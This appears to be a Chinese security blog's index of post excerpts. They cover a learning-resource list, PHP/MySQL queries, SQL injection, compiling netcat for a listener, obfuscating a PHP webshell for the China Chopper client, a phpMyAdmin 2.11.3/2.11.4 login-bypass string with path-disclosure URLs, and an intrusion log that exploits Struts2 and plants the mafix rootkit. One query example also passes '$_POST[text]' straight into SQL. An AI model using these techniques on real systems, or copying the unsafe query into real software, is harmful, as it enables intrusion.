摘要：以下所列出的链接均为在线文档，有志于信息安全的爱好者可由此作为入门指南。背景知识常规知识Sun认证-Solaris 9&10安全管理员学习指南PicoCTF资料应用软件安全OWASP安全编码规范漏洞挖掘Windows ISV软件安全防御移动安全OWASP十大移动手机安全风险网络安全常规网络攻击类型逆向工程华盛顿大学：硬件/软件接口伦敦大学：恶意软件和地下产业——一个巴掌拍不响Web安全OWASP十大Web应用安全风险在线课程多学科课程ISIS实验室黑客之夜涉及源码审计、Web安全、逆向工程、漏洞挖掘、Post-Exploitation、应用软件安全开放式安全训练涉及逆向工程、漏洞挖掘、 阅读全文

摘要：一查询数值型数据: SELECT * FROM tb_name WHERE sum > 100; 查询谓词:>,=,,!=,!>,!,='' order by addtime desc 注:相当于PHP中的!= 六利用变量查询数值型数据 SELECT * FROM tb_name WHERE id = '$_POST[text]' 注:利用变量查询数据时，传入SQL的变量不必用引号括起来，因为PHP中的字符串与数值型数据进行连接时，程序会自动将数值型数据转变成字符串，然后与要连接的字符串进行连接 七利用变量查询字符串数据 SELECT * FR 阅读全文

摘要：发起这个帖子，估计就很多人看到题目就表示不屑了。一直以来PHP+MySQL环境下，无论是写程序或者是注入攻击，是无法多语句执行的，这么广为人知的常识，没理由会有人不知道。可权威就是用来被挑战的，常识也就是为了被打破的。如果没有一点创新性，追根到底的求知欲，一直在条条框框里挣扎，那还有什么争取自由、解析世界的Hacker，Geek精神？最近在wooyun上看到一个很简单的sql注入案例，虽然漏洞很简单，但是其中蕴含的内容可大大不同。亮点在于：作者居然在注射利用过程中使用了mysql的多语句执行。感谢作者@紫梦芊 ，让我们一直以来奉为金科玉律的信条被彻底颠覆。本着Know it then hack 阅读全文

摘要：本地Windows监听nc -vv -l -p 1234首先从sf上get一个tar的压缩包wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz然后当然是解压了tar zxvf netcat-0.7.1.tar.gz解压完毕之后会生成目录，要cd进去cd netcat-0.7.1然后进行编译前的配置。./configure配置完了之后就可以make编译了。 www.2cto.com编译成功就生成了netcat可执行的文件 阅读全文

摘要：一开始想这样： 客户端用菜刀，密码cmd，url为test.php?ts7=assert 这个应该算没有什么特征码了，但是缺点就是在web日志中会暴露出来assert 可以都用post： 在菜刀说明用ts7=assertpost附加数据. 这中间考虑了这些： 猛然发现assert这个关键词又出现了。。 既然字符串可以直接这样用，那还可以这样： 或者用 $a = str_replace(x,"",axsxxsxexrxxt) 以上说来，感觉 算是最难查到的一种了。 ========================== ywisax 在论坛上又发了这个： 不... 阅读全文

摘要：影响版本：2.11.3 / 2.11.4利用方法：用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号，最后一个为英文双引号)附上几个php爆绝对路径的办法：phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpmyadmin/themes/darkblue_orange/layout.inc.php 阅读全文

摘要：总是记不住API。昨晚写的时候用到了这些，但是没记住，于是就索性整理一下吧：python中对文件、文件夹（文件操作函数）的操作需要涉及到os模块和shutil模块。得到当前工作目录，即当前Python脚本工作的目录路径: os.getcwd()返回指定目录下的所有文件和目录名:os.listdir()函数用来删除一个文件:os.remove()删除多个目录：os.removedirs（r“c：\python”）检验给出的路径是否是一个文件：os.path.isfile()检验给出的路径是否是一个目录：os.path.isdir()判断是否是绝对路径：os.path.isabs()检验给出的路径 阅读全文

摘要：/////////////////////////////////////////////////////////////////////////// 这是我的同事alert7在他主页上转scz的《你尽力了吗》，之前说的一段话，一些肺腑 直言，我觉得我该说的alert7也帮我说了，希望我们以及前人的思路可以指引大家 /////////////////////////////////////////////////////////////////////////// 自己都觉得这里的水平底的一塌糊涂，当然也包括我自己了，所以我经常也要 跑到whnet去问问题，有时候都恨自己怎么这么菜啊。 scz 阅读全文

摘要：目标：www.xxx.com0x01 主站踩点 下载 (57.45 KB)前天 14:28主站dedecms 目前公布的0day没有一个能用的，并且后台不是默认的，google hack无果。0x02 旁站分析 旁站有二十多个，大部分是现场的cms的二次开发，没有漏洞，还有一个bbs dz，同样也没有漏洞0x03 C段Linux主机突破 查询C段浏览网站发现一个 ssss.com/login.action ，熟悉吧 struct2代码执行不解释 下载 (11.43 KB)前天 14:280x04 Linux主机栽Rookit 这里我用的Rookit是mafix 执行命令： tar zxv... 阅读全文